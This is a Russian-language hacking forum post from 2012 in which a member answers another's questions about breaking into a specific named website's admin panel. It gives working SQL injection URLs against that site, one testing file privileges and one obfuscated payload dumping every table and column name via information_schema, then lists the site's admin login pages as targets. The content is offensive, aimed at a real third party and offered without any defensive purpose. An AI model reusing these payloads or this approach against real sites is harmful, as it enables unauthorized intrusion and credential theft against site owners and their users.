09.03.2012, 20:06
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от foma9999
Как узнал какие права? Какие нужны мне для этого? Как найти админку? Как найти таблицу где данные о логине и пассе админа?
1)
Код:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,file_priv+FROM+mysql.user+where+user=user()
Ошибка, значит нет прав.
2) Все таблицы:
Код:
http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x)
Как видишь ни намека на пароли. Видимо пароли в файлах или в др. учетках.
Вот цель например:
Код:
http://www.robolive.ru/cms/
http://www.robolive.ru/gb/admin/index.php?in_action=logon
|
|
|